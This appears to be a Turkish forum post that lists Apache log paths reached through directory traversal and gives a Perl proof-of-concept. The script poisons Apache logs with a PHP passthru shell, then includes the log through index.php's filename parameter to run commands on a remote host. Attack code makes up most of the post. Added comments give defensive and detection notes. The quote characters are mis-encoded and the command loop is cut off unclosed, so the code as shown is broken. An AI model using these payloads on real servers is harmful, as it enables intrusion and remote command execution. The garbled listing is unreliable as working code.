ProLeader ;
Selamun aleyküm // Aleyküm selam..
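Kod (LFI denemelerinde hedeflenen yaygın Apache erişim/hata günlüğü yolları; savunma tarafında istek parametrelerinde bu dizin atlama kalıpları aranmalıdır):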
./apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../etc/httpd/logs/acces_log
../../../../../../../etc/httpd/logs/acces.log
../../../../../../../etc/httpd/logs/error_log
../../../../../../../etc/httpd/logs/error.log
../../../../../../../var/www/logs/access_log
../../../../../../../var/www/logs/access.log
../../../../../../../usr/local/apache/logs/access_log
../../../../../../../usr/local/apache/logs/access.log
../../../../../../../var/log/apache/access_log
../../../../../../../var/log/apache2/access_log
../../../../../../../var/log/apache/access.log
../../../../../../../var/log/apache2/access.log
../../../../../../../var/log/access_log
../../../../../../../var/log/access.log
../../../../../../../var/www/logs/error_log
../../../../../../../var/www/logs/error.log
../../../../../../../usr/local/apache/logs/error_log
../../../../../../../usr/local/apache/logs/error.log
../../../../../../../var/log/apache/error_log
../../../../../../../var/log/apache2/error_log
../../../../../../../var/log/apache2/error.log
../../../../../../../var/log/error_log
../../../../../../../var/log/error.log
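Code (Perl; the quote characters are mis-encoded in this copy and the listing ends before the command loop is closed):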
#!/usr/bin/perl -w
# Forum proof-of-concept for Apache log poisoning chained with a PHP local
# file inclusion (LFI). As extracted, the string delimiters are mis-encoded
# and the command loop at the bottom is never closed, so the listing is kept
# verbatim and annotated for defenders rather than repaired.
#
# Flow shown by the code:
#   1. One hand-built HTTP request is sent whose request line and User-Agent
#      header both carry a PHP snippet ($code); the script then names $log as
#      the file it expects that text to have landed in.
#   2. Follow-up requests ask index.php to load $log through its `filename`
#      query parameter, with a `cmd` query parameter alongside.
#
# Defensive notes:
#   - The root cause sits on the target, not in this script: a PHP page that
#     feeds a request parameter to include/require. Such parameters should be
#     mapped to a fixed allowlist of files. NOTE(review): how index.php uses
#     `filename` is not shown on this page; confirm against the real target.
#   - Keep web server logs unreadable by the PHP runtime user and outside any
#     open_basedir scope; consider disable_functions for passthru/system/exec.
#   - Detection: "<?" appearing in the request line or User-Agent field of
#     access/error log entries, and `../` sequences or log file paths inside
#     query parameters.
use IO::Socket;
# NOTE(review): LWP::UserAgent is loaded but never referenced in the visible lines.
use LWP::UserAgent;
# Placeholder target host; the [url]...[/url] pieces are leftover forum markup.
$site=â[url]www.vulnerablesite.comâ;[/url]
# URL prefix placed in front of both the marker request and index.php.
$path=â/â;
# PHP snippet that hands the `cmd` query parameter to passthru().
$code=â<? Passthru(\$_GET[cmd]) ?>â;
# Relative path to the log file that is later supplied as `filename`.
$log = â../../../../../../../etc/httpd/logs/error_logâ;
print âTrying to inject the codeâ;
# Phase 1: raw TCP connection to port 80; the request is written by hand.
$socket = IO::Socket::INET->new(Proto=>âtcpâ, PeerAddr=>â$siteâ, PeerPort=>â80â) or die
â\nConnection Failed.\n\nâ;
# $code is placed in the request line and again in the User-Agent header;
# both fields are ones a web server commonly records in its logs.
print $socket âGET â.$path.$code.â HTTP/1.1\r\nâ;
print $socket âUser-Agent: â.$code.â\r\nâ;
print $socket âHost: â.$site.â\r\nâ;
print $socket âConnection: close\r\n\r\nâ;
# The socket is closed without reading any response, so the message printed
# next is unconditional and does not confirm anything about the server.
close($socket);
print â\nCode $code successfully injected in $log \nâ;
print â\nType command to run or exit to end: â;
# First line of operator input from the terminal.
$cmd = <STDIN>;
# Phase 2: repeat until the input matches "exit".
while($cmd !~ âexitâ) {
# A fresh connection is opened for every iteration.
$socket = IO::Socket::INET->new(Proto=>âtcpâ, PeerAddr=>â$siteâ, PeerPort=>â80â) or die
â\nConnection Failed.\n\nâ;
# Request index.php with `filename` set to the log path. On the server side
# this shows up as a traversal string inside a query parameter, which is the
# most direct indicator to alert on.
print $socket âGET â.$path.âindex.php?filename=â.$log.â&cmd=$ cmd HTTP/1.1\r\nâ;
print $socket âHost: â.$site.â\r\nâ;
print $socket âAccept: */*\r\nâ;
print $socket âConnection: close\r\n\nâ;
# Echo the server's response to the terminal line by line.
while ($show = <$socket>)
{
print $show;
}
# The listing stops after this prompt; the remainder of the loop is not on the page.
print âType command to run or exit to end: â
//ProLeader